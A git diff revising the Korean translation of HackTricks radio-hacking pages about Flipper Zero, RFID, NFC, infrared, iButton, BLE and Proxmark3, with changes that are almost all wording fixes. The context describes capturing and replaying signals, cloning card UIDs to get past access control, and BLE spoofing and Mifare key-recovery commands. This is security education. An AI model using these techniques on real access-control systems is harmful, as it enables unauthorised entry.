 - [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
 
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/todo/radio-hacking/flipper-zero/fz-ibutton.md b/src/todo/radio-hacking/flipper-zero/fz-ibutton.md
index 94b514a77..0f49a0550 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-ibutton.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-ibutton.md
@@ -12,7 +12,7 @@ iButton에 대한 더 많은 정보는 다음을 확인하세요:
 
 ## Design
 
-다음 이미지의 **파란색** 부분은 Flipper가 **읽을 수 있도록 실제 iButton을** **놓아야 하는 방법**입니다. **녹색** 부분은 Flipper zero로 **iButton을 올바르게 에뮬레이트하기 위해 리더에** **접촉해야 하는 방법**입니다.
+다음 이미지의 **파란색** 부분은 Flipper가 **읽을 수 있도록 실제 iButton을 넣어야 하는 방법**입니다. **녹색** 부분은 Flipper Zero로 **iButton을 올바르게 에뮬레이트하기 위해 리더에 접촉해야 하는 방법**입니다.
 
 <figure><img src="../../../images/image (565).png" alt=""><figcaption></figcaption></figure>
 
@@ -20,15 +20,15 @@ iButton에 대한 더 많은 정보는 다음을 확인하세요:
 
 ### Read
 
-읽기 모드에서 Flipper는 iButton 키가 접촉하기를 기다리며, **Dallas, Cyfral, Metakom**의 세 가지 유형의 키를 소화할 수 있습니다. Flipper는 **키의 유형을 스스로 파악합니다**. 키 프로토콜의 이름은 ID 번호 위의 화면에 표시됩니다.
+읽기 모드에서 Flipper는 iButton 키가 접촉하기를 기다리며, **Dallas, Cyfral, Metakom**의 세 가지 유형의 키를 처리할 수 있습니다. Flipper는 **키의 유형을 스스로 파악합니다**. 키 프로토콜의 이름은 ID 번호 위의 화면에 표시됩니다.
 
 ### Add manually
 
-**Dallas, Cyfral, Metakom** 유형의 iButton을 **수동으로 추가하는** 것이 가능합니다.
+**Dallas, Cyfral, Metakom** 유형의 iButton을 **수동으로 추가**하는 것이 가능합니다.
 
 ### **Emulate**
 
-저장된 iButton(읽기 또는 수동 추가된)을 **에뮬레이트하는** 것이 가능합니다.
+저장된 iButton(읽기 또는 수동 추가된)을 **에뮬레이트**하는 것이 가능합니다.
 
 > [!NOTE]
 > Flipper Zero의 예상 접촉이 리더에 닿지 않는 경우 **외부 GPIO를 사용할 수 있습니다:**
diff --git a/src/todo/radio-hacking/flipper-zero/fz-infrared.md b/src/todo/radio-hacking/flipper-zero/fz-infrared.md
index 064dc0a59..e3358a121 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-infrared.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-infrared.md
@@ -12,26 +12,26 @@ Infrared가 작동하는 방식에 대한 자세한 정보는 다음을 확인
 
 ## IR Signal Receiver in Flipper Zero <a href="#ir-signal-receiver-in-flipper-zero" id="ir-signal-receiver-in-flipper-zero"></a>
 
-Flipper는 디지털 IR 신호 수신기 TSOP를 사용하여 **IR 리모컨의 신호를 가로챌 수 있습니다**. Xiaomi와 같은 일부 **스마트폰**도 IR 포트를 가지고 있지만, **대부분은 신호를 전송만 할 수 있고** 수신할 수는 없습니다.
+Flipper는 **IR 리모컨의 신호를 가로챌 수 있는** 디지털 IR 신호 수신기 TSOP를 사용합니다. Xiaomi와 같은 **스마트폰** 중 일부는 IR 포트를 가지고 있지만, **대부분은 신호를 전송만 할 수 있고** 수신할 수는 없습니다.
 
-Flipper의 적외선 **수신기는 매우 민감합니다**. 리모컨과 TV 사이의 **어딘가에 있는 동안에도 신호를 잡을 수 있습니다**. 리모컨을 Flipper의 IR 포트에 직접 겨냥할 필요는 없습니다. 이는 누군가 TV 근처에서 채널을 변경할 때 유용하며, 당신과 Flipper는 일정 거리를 두고 있을 수 있습니다.
+Flipper의 적외선 **수신기는 상당히 민감합니다**. 리모컨과 TV 사이의 **어딘가에 있는 동안에도 신호를 잡을 수 있습니다**. 리모컨을 Flipper의 IR 포트에 직접 겨냥할 필요는 없습니다. 이는 누군가 TV 근처에서 채널을 변경할 때 유용하며, 당신과 Flipper는 일정 거리를 두고 있을 수 있습니다.
 
-**적외선 신호의 디코딩**은 **소프트웨어** 측에서 이루어지므로, Flipper Zero는 **모든 IR 리모컨 코드의 수신 및 전송을 지원할 수 있습니다**. 인식할 수 없는 **알 수 없는** 프로토콜의 경우, Flipper는 수신한 그대로의 원시 신호를 **기록하고 재생**합니다.
+**적외선 신호의 디코딩**은 **소프트웨어** 측에서 이루어지므로, Flipper Zero는 **모든 IR 리모컨 코드의 수신 및 전송을 지원할 가능성이 있습니다**. 인식할 수 없는 **알 수 없는** 프로토콜의 경우, Flipper는 수신한 원시 신호를 **기록하고 재생**합니다.
 
 ## Actions
 
 ### Universal Remotes
 
-Flipper Zero는 **모든 TV, 에어컨 또는 미디어 센터를 제어하는 범용 리모컨**으로 사용할 수 있습니다. 이 모드에서 Flipper는 **SD 카드의 사전**에 따라 모든 지원 제조업체의 **알려진 코드**를 **무작위로 시도합니다**. 레스토랑 TV를 끄기 위해 특정 리모컨을 선택할 필요는 없습니다.
+Flipper Zero는 **모든 TV, 에어컨 또는 미디어 센터를 제어하는 범용 리모컨으로 사용할 수 있습니다**. 이 모드에서 Flipper는 **SD 카드의 사전**에 따라 모든 지원 제조업체의 **알려진 코드**를 **무작위로 시도합니다**. 레스토랑 TV를 끄기 위해 특정 리모컨을 선택할 필요는 없습니다.
 
 범용 리모컨 모드에서 전원 버튼을 누르기만 하면 Flipper는 **알고 있는 모든 TV의 "전원 끄기"** 명령을 순차적으로 전송합니다: Sony, Samsung, Panasonic... 등. TV가 신호를 수신하면 반응하여 꺼집니다.
 
-이러한 무작위 시도는 시간이 걸립니다. 사전이 클수록 완료하는 데 더 오랜 시간이 걸립니다. TV가 어떤 신호를 정확히 인식했는지 알 수 없으며, TV로부터 피드백이 없기 때문입니다.
+이러한 무작위 시도는 시간이 걸립니다. 사전이 클수록 완료하는 데 더 오랜 시간이 걸립니다. TV가 정확히 어떤 신호를 인식했는지 알 수 없으며, TV로부터 피드백이 없기 때문입니다.
 
 ### Learn New Remote
 
-Flipper Zero로 **적외선 신호를 캡처**할 수 있습니다. 데이터베이스에서 신호를 **찾으면** Flipper는 자동으로 **이 장치가 무엇인지 알게 되고** 상호작용할 수 있게 해줍니다.\
-신호를 찾지 못하면 Flipper는 **신호를 저장**하고 **재생**할 수 있게 해줍니다.
+Flipper Zero로 **적외선 신호를 캡처하는 것이 가능합니다**. 데이터베이스에서 신호를 **찾으면** Flipper는 자동으로 **이 장치가 무엇인지 알게 되고** 상호작용할 수 있게 해줍니다.\
+신호를 찾지 못하면 Flipper는 **신호를 저장하고** **재생할 수 있게 해줍니다**.
 
 ## References
 
diff --git a/src/todo/radio-hacking/flipper-zero/fz-nfc.md b/src/todo/radio-hacking/flipper-zero/fz-nfc.md
index 83a4cac93..e04ea4ef4 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-nfc.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-nfc.md
@@ -20,7 +20,7 @@ RFID 및 NFC에 대한 정보는 다음 페이지를 확인하세요:
 - **은행 카드 (EMV)** — UID, SAK 및 ATQA만 읽고 저장하지 않습니다.
 - **알 수 없는 카드** — (UID, SAK, ATQA)를 읽고 UID를 에뮬레이트합니다.
 
-**NFC 카드 유형 B, F 및 V**의 경우, Flipper Zero는 UID를 읽을 수 있지만 저장하지는 않습니다.
+**NFC 카드 유형 B, F 및 V**의 경우, Flipper Zero는 UID를 읽을 수 있지만 저장하지 않습니다.
 
 ### NFC 카드 유형 A <a href="#uvusf" id="uvusf"></a>
 
@@ -28,7 +28,7 @@ RFID 및 NFC에 대한 정보는 다음 페이지를 확인하세요:
 
 Flipper Zero는 은행 카드에서 UID, SAK, ATQA 및 저장된 데이터를 **저장하지 않고** 읽을 수 있습니다.
 
-은행 카드 읽기 화면 은행 카드의 경우, Flipper Zero는 데이터를 **저장하지 않고 에뮬레이트하지 않고** 읽을 수 있습니다.
+은행 카드 읽기 화면은행 카드의 경우, Flipper Zero는 데이터를 **저장하지 않고 에뮬레이트하지 않고** 읽을 수 있습니다.
 
 <figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-26-31.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=916&#x26;w=2662" alt=""><figcaption></figcaption></figure>
 
@@ -36,13 +36,13 @@ Flipper Zero는 은행 카드에서 UID, SAK, ATQA 및 저장된 데이터를 **
 
 Flipper Zero가 **NFC 카드의 유형을 결정할 수 없는 경우**, **UID, SAK 및 ATQA**만 **읽고 저장할 수 있습니다**.
 
-알 수 없는 카드 읽기 화면 Flipper Zero는 알 수 없는 NFC 카드에서 UID만 에뮬레이트할 수 있습니다.
+알 수 없는 카드 읽기 화면알 수 없는 NFC 카드의 경우, Flipper Zero는 UID만 에뮬레이트할 수 있습니다.
 
 <figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-27-53.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=932&#x26;w=2634" alt=""><figcaption></figcaption></figure>
 
 ### NFC 카드 유형 B, F 및 V <a href="#wyg51" id="wyg51"></a>
 
-**NFC 카드 유형 B, F 및 V**의 경우, Flipper Zero는 UID를 **읽고 표시할 수 있지만** 저장하지는 않습니다.
+**NFC 카드 유형 B, F 및 V**의 경우, Flipper Zero는 UID를 **읽고 표시할 수 있지만** 저장하지 않습니다.
 
 <figure><img src="https://archbee.imgix.net/3StCFqarJkJQZV-7N79yY/zBU55Fyj50TFO4U7S-OXH_screenshot-2022-08-12-at-182540.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=1080&#x26;w=2704" alt=""><figcaption></figcaption></figure>
 
@@ -52,7 +52,7 @@ NFC에 대한 소개는 [**이 페이지를 읽어보세요**](../pentesting-rfi
 
 ### 읽기
 
-Flipper Zero는 **NFC 카드를 읽을 수 있지만**, ISO 14443를 기반으로 한 모든 프로토콜을 **이해하지는 못합니다**. 그러나 **UID는 저수준 속성**이기 때문에, **UID가 이미 읽혔지만 고수준 데이터 전송 프로토콜은 여전히 알 수 없는 상황**에 처할 수 있습니다. Flipper를 사용하여 UID를 읽고 에뮬레이트하며 수동으로 입력할 수 있습니다. UID를 인증에 사용하는 원시 리더기에서 사용할 수 있습니다.
+Flipper Zero는 **NFC 카드를 읽을 수 있지만**, ISO 14443를 기반으로 한 모든 프로토콜을 **이해하지는 못합니다**. 그러나 **UID는 저수준 속성**이기 때문에, **UID가 이미 읽혔지만 고수준 데이터 전송 프로토콜은 여전히 알 수 없는 상황에 처할 수 있습니다**. Flipper를 사용하여 UID를 읽고 에뮬레이트하며 수동으로 입력할 수 있습니다. UID를 인증에 사용하는 원시 리더기에서 사용할 수 있습니다.
 
 #### UID 읽기 VS 내부 데이터 읽기 <a href="#reading-the-uid-vs-reading-the-data-inside" id="reading-the-uid-vs-reading-the-data-inside"></a>
 
diff --git a/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
index ad2644bfc..08a5bbd64 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
@@ -33,7 +33,7 @@ Flipper Zero는 [](https://www.st.com/en/nfc/st25r3916.html#overview)[CC11
 ### 읽기
 
 > [!NOTE]
-> 사용 중인 주파수에 대한 정보를 찾기 (또한 사용 중인 주파수를 찾는 또 다른 방법)
+> 사용된 주파수에 대한 정보 찾기 (어떤 주파수가 사용되는지 찾는 또 다른 방법)
 
 **읽기** 옵션은 **지정된 변조에서 구성된 주파수를 청취**합니다: 기본값은 433.92 AM입니다. 읽기 중 **무언가가 발견되면**, **정보가** 화면에 표시됩니다. 이 정보는 미래에 신호를 복제하는 데 사용할 수 있습니다.
 
@@ -42,10 +42,10 @@ Flipper Zero는 [](https://www.st.com/en/nfc/st25r3916.html#overview)[CC11
 
 <figure><img src="../../../images/image (947).png" alt=""><figcaption></figcaption></figure>
 
-**관심 있는 주파수**를 설정할 수 있지만, 원격 제어가 사용하는 주파수가 **확실하지 않은 경우**, **호핑을 켜기로 설정**(기본값은 꺼짐)하고 버튼을 여러 번 눌러 Flipper가 이를 캡처하고 주파수를 설정하는 데 필요한 정보를 제공하도록 합니다.
+**관심 있는 주파수**를 설정할 수 있지만, 원격 제어가 사용하는 주파수가 **확실하지 않은 경우**, **호핑을 켜기로 설정**(기본값은 꺼짐)하고 버튼을 여러 번 눌러 Flipper가 이를 캡처하고 주파수를 설정하는 데 필요한 정보를 제공합니다.
 
 > [!CAUTION]
-> 주파수 간 전환에는 시간이 걸리므로 전환 시 전송된 신호가 누락될 수 있습니다. 더 나은 신호 수신을 위해 주파수 분석기에 의해 결정된 고정 주파수를 설정하십시오.
+> 주파수 간 전환에는 시간이 걸리므로 전환 중에 전송된 신호가 누락될 수 있습니다. 더 나은 신호 수신을 위해 주파수 분석기에 의해 결정된 고정 주파수를 설정하십시오.
 
 ### **원시 읽기**
 
@@ -54,7 +54,7 @@ Flipper Zero는 [](https://www.st.com/en/nfc/st25r3916.html#overview)[CC11
 
 **원시 읽기** 옵션은 **청취 주파수에서 전송된 신호를 기록**합니다. 이는 신호를 **훔치고** **반복**하는 데 사용할 수 있습니다.
 
-기본적으로 **원시 읽기는 AM650에서 433.92로 설정되어 있지만**, 읽기 옵션으로 관심 있는 신호가 **다른 주파수/변조에 있는 경우**, 원시 읽기 옵션 내에서 왼쪽 버튼을 눌러 수정할 수 있습니다.
+기본적으로 **원시 읽기는 AM650에서 433.92로 설정되어 있지만**, 읽기 옵션에서 관심 있는 신호가 **다른 주파수/변조에 있는 경우**, 원시 읽기 옵션 내에서 왼쪽 버튼을 눌러 수정할 수 있습니다.
 
 ### 무차별 대입
 
@@ -88,7 +88,7 @@ Flipper Zero는 [](https://www.st.com/en/nfc/st25r3916.html#overview)[CC11
 
 [https://docs.flipperzero.one/sub-ghz/supported-vendors](https://docs.flipperzero.one/sub-ghz/supported-vendors)에서 목록을 확인하십시오.
 
-### 지역별 지원되는 주파수
+### 지역별 지원 주파수
 
 [https://docs.flipperzero.one/sub-ghz/frequencies](https://docs.flipperzero.one/sub-ghz/frequencies)에서 목록을 확인하십시오.
 
diff --git a/src/todo/radio-hacking/ibutton.md b/src/todo/radio-hacking/ibutton.md
index 4e24b7ae9..41c27d6f1 100644
--- a/src/todo/radio-hacking/ibutton.md
+++ b/src/todo/radio-hacking/ibutton.md
@@ -20,9 +20,9 @@ iButton은 **동전 모양의 금속 용기**에 포장된 전자 식별 키의
 
 ### **1-Wire protocol** <a href="#id-1-wire-protocol" id="id-1-wire-protocol"></a>
 
-Dallas 키는 1-wire 프로토콜을 사용하여 데이터를 교환합니다. 데이터 전송을 위한 접점이 하나만 있으며 (!!) 양방향으로, 마스터에서 슬레이브로, 그리고 그 반대 방향으로도 작동합니다. 1-wire 프로토콜은 마스터-슬레이브 모델에 따라 작동합니다. 이 토폴로지에서 마스터는 항상 통신을 시작하고 슬레이브는 그 지침을 따릅니다.
+Dallas 키는 1-wire 프로토콜을 사용하여 데이터를 교환합니다. 데이터 전송을 위한 접점이 하나만 있으며 (!!) 양방향으로, 마스터에서 슬레이브로, 그리고 그 반대 방향으로 작동합니다. 1-wire 프로토콜은 마스터-슬레이브 모델에 따라 작동합니다. 이 토폴로지에서 마스터는 항상 통신을 시작하고 슬레이브는 그 지침을 따릅니다.
 
-키(슬레이브)가 인터콤(마스터)과 접촉하면, 키 내부의 칩이 켜지고 인터콤에 의해 전원이 공급되어 키가 초기화됩니다. 그 후 인터콤이 키 ID를 요청합니다. 다음으로 이 과정을 더 자세히 살펴보겠습니다.
+키(슬레이브)가 인터콤(마스터)과 접촉하면, 키 내부의 칩이 켜지고 인터콤에 의해 전원이 공급되어 키가 초기화됩니다. 그 후 인터콤이 키 ID를 요청합니다. 다음으로 이 과정을 좀 더 자세히 살펴보겠습니다.
 
 Flipper는 마스터 및 슬레이브 모드 모두에서 작동할 수 있습니다. 키 읽기 모드에서 Flipper는 리더로 작동하며, 즉 마스터로 작동합니다. 그리고 키 에뮬레이션 모드에서는 Flipper가 키인 척하며 슬레이브 모드에 있습니다.
 
diff --git a/src/todo/radio-hacking/infrared.md b/src/todo/radio-hacking/infrared.md
index a4a240724..9e532ebea 100644
--- a/src/todo/radio-hacking/infrared.md
+++ b/src/todo/radio-hacking/infrared.md
@@ -24,15 +24,15 @@ IR 프로토콜은 3가지 요소에서 다릅니다:
 
 <figure><img src="../../images/image (295).png" alt=""><figcaption></figcaption></figure>
 
-**2. 펄스 폭 인코딩**
+**2. 펄스 너비 인코딩**
 
-비트는 펄스 폭의 변조로 인코딩됩니다. 펄스 폭 후의 간격 너비는 일정합니다.
+비트는 펄스 너비의 변조로 인코딩됩니다. 펄스 폭 뒤의 간격 너비는 일정합니다.
 
 <figure><img src="../../images/image (282).png" alt=""><figcaption></figcaption></figure>
 
 **3. 위상 인코딩**
 
-맨체스터 인코딩으로도 알려져 있습니다. 논리 값은 펄스 폭과 간격 간의 전환의 극성에 의해 정의됩니다. "간격에서 펄스 폭"은 논리 "0"을 나타내고, "펄스 폭에서 간격"은 논리 "1"을 나타냅니다.
+맨체스터 인코딩으로도 알려져 있습니다. 논리 값은 펄스 폭과 간격 사이의 전환의 극성에 의해 정의됩니다. "간격에서 펄스 폭으로"는 논리 "0"을 나타내고, "펄스 폭에서 간격으로"는 논리 "1"을 나타냅니다.
 
 <figure><img src="../../images/image (634).png" alt=""><figcaption></figcaption></figure>
 
@@ -41,7 +41,7 @@ IR 프로토콜은 3가지 요소에서 다릅니다:
 > [!NOTE]
 > 여러 유형의 장치에 대해 **보편적이 되려고 하는** IR 프로토콜이 있습니다. 가장 유명한 것은 RC5와 NEC입니다. 불행히도, 가장 유명하다고 해서 가장 일반적이라는 의미는 아닙니다. 제 환경에서는 NEC 리모컨 두 개만 보았고 RC5는 없었습니다.
 >
-> 제조업체는 동일한 장치 범위 내에서도 고유한 IR 프로토콜을 사용하는 것을 좋아합니다(예: TV 박스). 따라서 서로 다른 회사의 리모컨과 때로는 동일한 회사의 서로 다른 모델의 리모컨은 동일한 유형의 다른 장치와 작동할 수 없습니다.
+> 제조업체는 동일한 장치 범위 내에서도 고유한 IR 프로토콜을 사용하는 것을 좋아합니다 (예: TV 박스). 따라서 서로 다른 회사의 리모컨과 때로는 동일한 회사의 서로 다른 모델의 리모컨은 동일한 유형의 다른 장치와 작동할 수 없습니다.
 
 ### IR 신호 탐색
 
@@ -55,7 +55,7 @@ IR 프로토콜은 3가지 요소에서 다릅니다:
 
 **NEC IR 프로토콜**은 짧은 명령과 반복 코드를 포함하며, 버튼이 눌리는 동안 전송됩니다. 명령과 반복 코드 모두 시작 부분에 동일한 프리앰블을 가지고 있습니다.
 
-NEC **명령**은 프리앰블 외에도 주소 바이트와 명령 번호 바이트로 구성되어 있으며, 이를 통해 장치는 수행해야 할 작업을 이해합니다. 주소 및 명령 번호 바이트는 전송의 무결성을 확인하기 위해 역값으로 중복됩니다. 명령의 끝에는 추가적인 정지 비트가 있습니다.
+NEC **명령**은 프리앰블 외에도 주소 바이트와 명령 번호 바이트로 구성되어 있으며, 이를 통해 장치는 수행해야 할 작업을 이해합니다. 주소 및 명령 번호 바이트는 전송의 무결성을 확인하기 위해 역값으로 복제됩니다. 명령 끝에는 추가적인 정지 비트가 있습니다.
 
 **반복 코드**는 프리앰블 뒤에 "1"이 있으며, 이는 정지 비트입니다.
 
@@ -64,7 +64,7 @@ NEC **명령**은 프리앰블 외에도 주소 바이트와 명령 번호 바
 ### 에어컨
 
 다른 리모컨과 달리 **에어컨은 눌린 버튼의 코드만 전송하지 않습니다**. 버튼이 눌릴 때 **모든 정보를 전송**하여 **에어컨과 리모컨이 동기화되도록** 합니다.\
-이렇게 하면 20ºC로 설정된 기계가 한 리모컨으로 21ºC로 증가하고, 다른 리모컨이 여전히 20ºC로 설정되어 있을 때 온도를 더 높이려고 하면 21ºC로 "증가"하게 됩니다(21ºC에 있다고 생각하고 22ºC로 증가하지 않음).
+이렇게 하면 20ºC로 설정된 기계가 한 리모컨으로 21ºC로 증가하고, 다른 리모컨이 여전히 20ºC로 설정되어 있을 때 온도를 더 높이려고 하면 21ºC로 "증가"하게 됩니다 (21ºC에 있다고 생각하고 22ºC로 증가하지 않음).
 
 ### 공격
 
diff --git a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index 41ba8bd7d..cfa2edb69 100644
--- a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -16,7 +16,7 @@ BLE 장치는 **광고 패킷**(**비콘**)을 전송하여 통신하며, 이 
 
 ### GATT
 
-**일반 속성 프로파일**(GATT)은 **장치가 데이터를 형식화하고 전송하는 방법**을 정의합니다. BLE 장치의 공격 표면을 분석할 때, GATT(또는 GATTs)에 주의를 집중하는 경우가 많습니다. 이는 **장치 기능이 트리거되는 방법**과 데이터가 저장, 그룹화 및 수정되는 방법이기 때문입니다. GATT는 장치의 특성, 설명자 및 서비스를 16비트 또는 32비트 값으로 표 형식으로 나열합니다. **특성**은 중앙 장치와 주변 장치 간에 **전송되는 데이터** 값입니다. 이러한 특성은 **추가 정보를 제공하는 설명자**를 가질 수 있습니다. **특성**은 특정 작업을 수행하는 것과 관련이 있는 경우 **서비스**에 **그룹화**되는 경우가 많습니다.
+**일반 속성 프로파일**(GATT)은 **장치가 데이터를 형식화하고 전송하는 방법**을 정의합니다. BLE 장치의 공격 표면을 분석할 때, GATT(또는 GATTs)에 주의를 집중하는 경우가 많습니다. 이는 **장치 기능이 트리거되는 방법**과 데이터가 저장, 그룹화 및 수정되는 방법이기 때문입니다. GATT는 장치의 특성, 설명자 및 서비스를 16비트 또는 32비트 값으로 표에 나열합니다. **특성**은 중앙 장치와 주변 장치 간에 **전송되는** **데이터** 값입니다. 이러한 특성은 **추가 정보를 제공하는 설명자**를 가질 수 있습니다. **특성**은 특정 작업을 수행하는 것과 관련이 있는 경우 **서비스**에 **그룹화**되는 경우가 많습니다.
 
 ## Enumeration
 ```bash
@@ -30,7 +30,7 @@ spooftooph -i hci0 -a 11:22:33:44:55:66
 ```
 ### GATTool
 
-**GATTool**은 다른 장치와 **연결**을 **설정**하고, 해당 장치의 **특성**을 나열하며, 속성을 읽고 쓸 수 있게 해줍니다.\
+**GATTool**는 다른 장치와 **연결**을 **설정**하고, 해당 장치의 **특성**을 나열하며, 속성을 읽고 쓸 수 있게 해줍니다.\
 GATTTool은 `-I` 옵션으로 대화형 셸을 시작할 수 있습니다:
 ```bash
 gatttool -i hci0 -I
diff --git a/src/todo/radio-hacking/pentesting-rfid.md b/src/todo/radio-hacking/pentesting-rfid.md
index a0aa39700..d60c942e6 100644
--- a/src/todo/radio-hacking/pentesting-rfid.md
+++ b/src/todo/radio-hacking/pentesting-rfid.md
@@ -39,15 +39,15 @@ ISO 표준은 태그가 속한 **객체의 종류**를 나타내는 코드인 
 
 - **긴 범위** — 낮은 주파수는 더 높은 범위로 이어집니다. EM-Marin 및 HID 판독기가 있으며, 최대 1미터 거리에서 작동합니다. 이러한 태그는 주차장에서 자주 사용됩니다.
 - **원시 프로토콜** — 낮은 데이터 전송 속도로 인해 이러한 태그는 짧은 ID만 전송할 수 있습니다. 대부분의 경우 데이터는 인증되지 않으며 어떤 방식으로도 보호되지 않습니다. 카드가 판독기의 범위에 들어가면 ID를 전송하기 시작합니다.
-- **낮은 보안** — 이러한 카드는 쉽게 복사되거나 심지어 다른 사람의 주머니에서 읽힐 수 있습니다. 프로토콜의 원시성 때문입니다.
+- **낮은 보안** — 이러한 카드는 쉽게 복사되거나 심지어 다른 사람의 주머니에서 읽힐 수 있습니다.
 
 **인기 있는 125 kHz 프로토콜:**
 
 - **EM-Marin** — EM4100, EM4102. CIS에서 가장 인기 있는 프로토콜입니다. 단순성과 안정성 덕분에 약 1미터 거리에서 읽을 수 있습니다.
-- **HID Prox II** — HID Global에서 도입한 저주파 프로토콜입니다. 이 프로토콜은 서구 국가에서 더 인기가 있습니다. 더 복잡하며 이 프로토콜의 카드와 판독기는 상대적으로 비쌉니다.
-- **Indala** — Motorola에서 도입한 매우 오래된 저주파 프로토콜로, 나중에 HID에 인수되었습니다. 이전 두 프로토콜에 비해 사용 빈도가 낮습니다.
+- **HID Prox II** — HID Global에서 도입한 저주파 프로토콜입니다. 이 프로토콜은 서구 국가에서 더 인기가 있습니다. 더 복잡하며 이 프로토콜에 대한 카드와 판독기는 상대적으로 비쌉니다.
+- **Indala** — Motorola에서 도입한 매우 오래된 저주파 프로토콜로, 이후 HID에 인수되었습니다. 이전 두 프로토콜에 비해 사용 빈도가 낮습니다.
 
-실제로 저주파 프로토콜은 훨씬 더 많습니다. 그러나 이들은 모두 물리적 레이어에서 동일한 변조를 사용하며, 나열된 프로토콜의 변형으로 간주될 수 있습니다.
+실제로 저주파 프로토콜은 훨씬 더 많습니다. 그러나 이들은 모두 물리적 계층에서 동일한 변조를 사용하며, 나열된 프로토콜의 변형으로 간주될 수 있습니다.
 
 ### Attack
 
@@ -66,7 +66,7 @@ flipper-zero/fz-125khz-rfid.md
 
 <figure><img src="../../images/image (930).png" alt=""><figcaption></figcaption></figure>
 
-간단히 말해, NFC의 아키텍처는 다음과 같이 작동합니다: 전송 프로토콜은 카드를 만드는 회사에 의해 선택되며, 저수준 ISO 14443를 기반으로 구현됩니다. 예를 들어, NXP는 Mifare라는 고급 전송 프로토콜을 발명했습니다. 그러나 저수준에서 Mifare 카드는 ISO 14443-A 표준을 기반으로 합니다.
+간단히 말해, NFC의 아키텍처는 다음과 같이 작동합니다: 전송 프로토콜은 카드를 만드는 회사에 의해 선택되며 저수준 ISO 14443를 기반으로 구현됩니다. 예를 들어, NXP는 Mifare라는 고급 전송 프로토콜을 발명했습니다. 그러나 낮은 수준에서 Mifare 카드는 ISO 14443-A 표준을 기반으로 합니다.
 
 Flipper는 저수준 ISO 14443 프로토콜과 Mifare Ultralight 데이터 전송 프로토콜 및 은행 카드에서 사용되는 EMV와 상호작용할 수 있습니다. Mifare Classic 및 NFC NDEF에 대한 지원 추가 작업을 진행 중입니다. NFC를 구성하는 프로토콜 및 표준에 대한 철저한 검토는 별도의 기사로 다룰 가치가 있으며, 나중에 게시할 계획입니다.
 
@@ -75,7 +75,7 @@ ISO 14443-A 표준을 기반으로 하는 모든 고주파 카드는 고유한 
 UID에 의존하여 **인증 및 접근 권한 부여**를 수행하는 많은 출입 통제 시스템이 있습니다. 때때로 RFID 태그가 **암호화를 지원**할 때도 **이런 오용**이 발생합니다. 이러한 오용은 보안 측면에서 **125 kHz 카드** 수준으로 떨어뜨립니다. 가상 카드(예: Apple Pay)는 동적 UID를 사용하여 전화 소유자가 결제 앱으로 문을 열지 않도록 합니다.
 
 - **짧은 범위** — 고주파 카드는 판독기에 가까이 배치되어야 하도록 특별히 설계되었습니다. 이는 카드가 무단 상호작용으로부터 보호되는 데도 도움이 됩니다. 우리가 달성한 최대 읽기 범위는 약 15cm였으며, 이는 맞춤형 고범위 판독기를 사용했을 때입니다.
-- **고급 프로토콜** — 데이터 전송 속도가 424 kbps에 달하여 복잡한 프로토콜과 완전한 양방향 데이터 전송을 가능하게 합니다. 이는 **암호화**, 데이터 전송 등을 허용합니다.
+- **고급 프로토콜** — 데이터 전송 속도가 최대 424 kbps로 복잡한 프로토콜을 허용하며, 완전한 양방향 데이터 전송이 가능합니다. 이는 **암호화**, 데이터 전송 등을 가능하게 합니다.
 - **높은 보안** — 고주파 비접촉 카드가 스마트 카드에 비해 열등하지 않습니다. AES와 같은 암호적으로 강력한 알고리즘을 지원하고 비대칭 암호화를 구현하는 카드도 있습니다.
 
 ### Attack
diff --git a/src/todo/radio-hacking/proxmark-3.md b/src/todo/radio-hacking/proxmark-3.md
index 91a824038..cd99dd88c 100644
--- a/src/todo/radio-hacking/proxmark-3.md
+++ b/src/todo/radio-hacking/proxmark-3.md
@@ -10,7 +10,7 @@
 
 **16개의 섹터**가 있으며, 각 섹터는 **4개의 블록**을 가지고 있고 각 블록은 **16B**를 포함합니다. UID는 섹터 0 블록 0에 있으며(변경할 수 없음).\
 각 섹터에 접근하려면 **2개의 키**(**A**와 **B**)가 필요하며, 이 키는 **각 섹터의 블록 3**에 저장됩니다(섹터 트레일러). 섹터 트레일러는 또한 **접근 비트**를 저장하여 **2개의 키**를 사용하여 **각 블록**에 대한 **읽기 및 쓰기** 권한을 부여합니다.\
-2개의 키는 첫 번째 키를 알고 있으면 읽기 권한을, 두 번째 키를 알고 있으면 쓰기 권한을 부여하는 데 유용합니다(예를 들어).
+2개의 키는 첫 번째 키를 알고 있으면 읽기 권한을 부여하고 두 번째 키를 알고 있으면 쓰기 권한을 부여하는 데 유용합니다(예를 들어).
 
 여러 가지 공격을 수행할 수 있습니다.
 ```bash
@@ -53,4 +53,6 @@ Proxmark3 소프트웨어에는 간단한 작업을 수행하는 데 사용할 
 ```
 proxmark3> script run mfkeys
 ```
-**태그 리더기를 퍼즈(fuzz)하기 위한 스크립트를 생성할 수 있습니다.** 유효한 카드의 데이터를 복사하려면, 하나 이상의 무작위 바이트를 무작위화하고 각 반복에서 리더가 충돌하는지 확인하는 **Lua 스크립트**를 작성하세요.
+**태그 리더기를 퍼즈하기 위한** 스크립트를 생성할 수 있습니다. 따라서 **유효한 카드**의 데이터를 복사하려면 **Lua 스크립트**를 작성하여 하나 이상의 무작위 **바이트**를 **무작위화**하고 각 반복에서 **리더가 충돌하는지** 확인하십시오. 
+
+{{#include ../../banners/hacktricks-training.md}}
